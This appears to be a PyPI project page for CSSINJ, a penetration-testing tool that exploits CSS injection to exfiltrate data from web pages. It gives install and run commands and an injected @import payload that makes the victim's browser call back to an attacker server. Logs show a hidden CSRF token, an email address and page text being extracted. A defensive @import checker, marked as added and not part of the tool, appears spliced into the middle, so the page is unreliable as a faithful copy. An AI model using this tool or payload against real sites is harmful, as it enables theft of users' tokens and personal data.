A Python tool that exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications.

Project description


CSSINJ

  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

About

CSSINJ is a penetration testing tool that exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications. This tool is designed for security professionals to assess the security posture of web applications by demonstrating how CSS can be used to extract data covertly.

Installation

To install and set up CSSINJ from source, run the following commands:

git clone https://github.com/DonAsako/CSSinj.git
cd CSSinj
python3 -m venv venv  
source venv/bin/activate
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade build
python3 -m build
python3 -m pip install .

Now you’re ready to use CSSINJ! 🎯

Usage

python3 -m cssinj [-h] -H HOSTNAME -p PORT [-e ELEMENT] [-a ATTRIBUT] [-d] [-m {recusive,font-face}] [-o OUTPUT]

Options

Option            Description
-h, --help        Show help message and exit
-H, --hostname    Attacker hostname or IP address
-p, --port        Port number of the attacker
-e, --element     HTML element to extract specific data
-a, --attribut    Specify an element Attribute Selector for exfiltration
-d, --details     Show detailed logs of the exfiltration process, including extracted data
-m, --method      Specify the type of exfiltration (recusive or font-face)
-o, --output      File to store the exfiltrated data in JSON format

Example

Victim's view:

<h1>Welcome on my page !</h1>
<input type="text" id="username" value="admin" disabled>
<input type="email" id="email" value="admin@admin.XX" disabled>
<input type="text" class="csrf" value="MySecretAdminToken" hidden>
<img src="XXXXXXXXXXX.XX">
...
<style>
  @import url('//localhost:5005/start');
</style>
...

Recursive attack

Using a specific HTML identifier:

~ python3 CSSINJ.py inject -H 127.0.0.1 -p 5005 -e input
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-03-11 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] 🌐 Connection from ::1
[2025-03-11 03:06:49] ⚙️ ID : 1
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : MySecretAdminToken
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : admin@admin.XX
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : admin

Using a specific CSS attribute selector and a generic HTML identifier:

~ python3 CSSINJ.py -H 127.0.0.1 -p 5005 -e '*' -a src
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-03-11 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] 🌐 Connection from ::1
[2025-03-11 03:06:49] ⚙️ ID : 1
[2025-03-11 03:06:49]  [1] - The src exfiltrated from * is : XXXXXXXXXXX.XX

Font-face attack

~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e h1 --method font-face
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-05-21 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-05-21 03:06:49] 🌐 Connection from 127.0.0.1
[2025-05-21 03:06:49] ⚙️ ID : 1
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 :  
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : e
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : W
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : l
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : c
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : o
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : m
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : n
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : y
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : p
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : a
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : g
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : !

Browser-Specific Behavior

The success of CSS injection attacks using @import depends on the browser's handling of CSS imports:

  • Chromium-based browsers (Chrome, Edge, Brave, etc.) allow recursive CSS imports and will process the injected styles, making them vulnerable to exfiltration techniques using @import.

  • Firefox, however, handles @import differently:

    • Unlike Chromium-based browsers, Firefox processes all @import rules before applying any styles.
    • As a result, the attack fails because the browser never processes the CSS selectors, preventing data exfiltration.
    • This behavior causes an infinite loop where the browser keeps waiting for a CSS update that never happens.

This difference in behavior makes Chromium-based browsers more susceptible to CSS injection exfiltration, while Firefox provides better protection against such attacks.
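
A defensive check for the pattern shown in the victim's view, added here as an example that is not part of CSSINJ: it parses a page's inline `<style>` blocks and reports `@import` targets whose origin differs from the page's own. The page URL `https://app.example/profile`, the second `@import` line in the sample and all function names are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Matches @import url('x'), @import url(x), @import "x" and @import 'x'.
IMPORT_RE = re.compile(r"""@import\s+(?:url\(\s*)?(['"]?)([^'"\)\s;]+)\1""", re.I)
DEFAULT_PORTS = {"http": 80, "https": 443}

class StyleCollector(HTMLParser):
    """Collects the text of every inline <style> element."""
    def __init__(self):
        super().__init__()
        self.in_style = False
        self.blocks = []
    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self.in_style = True
            self.blocks.append("")
    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
    def handle_data(self, data):
        if self.in_style:
            self.blocks[-1] += data

def origin(url):
    """Returns (scheme, host, port) with default ports filled in."""
    parts = urlsplit(url)
    return parts.scheme, parts.hostname, parts.port or DEFAULT_PORTS.get(parts.scheme)

def cross_origin_imports(page_url, html):
    """Lists @import targets in inline styles that leave page_url's origin."""
    collector = StyleCollector()
    collector.feed(html)
    found = []
    for css in collector.blocks:
        css = re.sub(r"/\*.*?\*/", "", css, flags=re.DOTALL)  # drop CSS comments
        for _quote, target in IMPORT_RE.findall(css):
            absolute = urljoin(page_url, target)  # resolves //host and /path forms
            if origin(absolute) != origin(page_url):
                found.append(absolute)
    return found

# Constructed sample based on the victim's view; the page URL is an assumption.
SAMPLE = """<style>
  @import url('//localhost:5005/start');
  @import "/static/theme.css";
</style>"""
```

It inspects inline `<style>` blocks only; externally linked stylesheets would need to be fetched and scanned the same way.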

Todo

  • General :

    • Add error Handler
      • File error Handler
    • Add test
    • Edit Terminal
  • Injection :

    • Add injection parameters
    • Add an option to save results to a file
    • Allow multiple CSS selectors for simultaneous extraction
    • Add g all of the page
    • Refactor cssinjector.py
    • Add timeout

Disclaimer

This tool is intended only for ethical hacking and security research. Unauthorized use on systems without explicit permission is illegal. The developer is not responsible for any misuse of this tool.

Author

CSSINJ was developed by Asako.


Download files

Source Distribution

cssinj-0.1.0.tar.gz (47.9 kB view details)

Uploaded Source

Built Distribution

cssinj-0.1.0-py3-none-any.whl (35.7 kB view details)

Uploaded Python 3

File details

Details for the file cssinj-0.1.0.tar.gz.

File metadata

  • Download URL: cssinj-0.1.0.tar.gz
  • Upload date:
  • Size: 47.9 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.7

File hashes

Hashes for cssinj-0.1.0.tar.gz
Algorithm Hash digest
SHA256 b7c0d2728f87913be5e73fe514162ac28cdae6f5a38e720338eb3bc4108667cd
MD5 5988b7ed155ad793aedfe0d445339af3
BLAKE2b-256 5849c049f2560ee4462de99715f5b39f4cd90b318dd3e064d9b0b2546882387b

File details

Details for the file cssinj-0.1.0-py3-none-any.whl.

File metadata

  • Download URL: cssinj-0.1.0-py3-none-any.whl
  • Upload date:
  • Size: 35.7 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.7

File hashes

Hashes for cssinj-0.1.0-py3-none-any.whl
Algorithm Hash digest
SHA256 d0f7c3462e28574eae9651872565aeb20fba5e2b901444938c66f04c19576da1
MD5 08e0f0e48f98cc7ffb89bd32d9a4875a
BLAKE2b-256 c6aa60409fa2d3f9a07eb6ca895c23c1e69f3abbfb7087c8428520f19a39344d
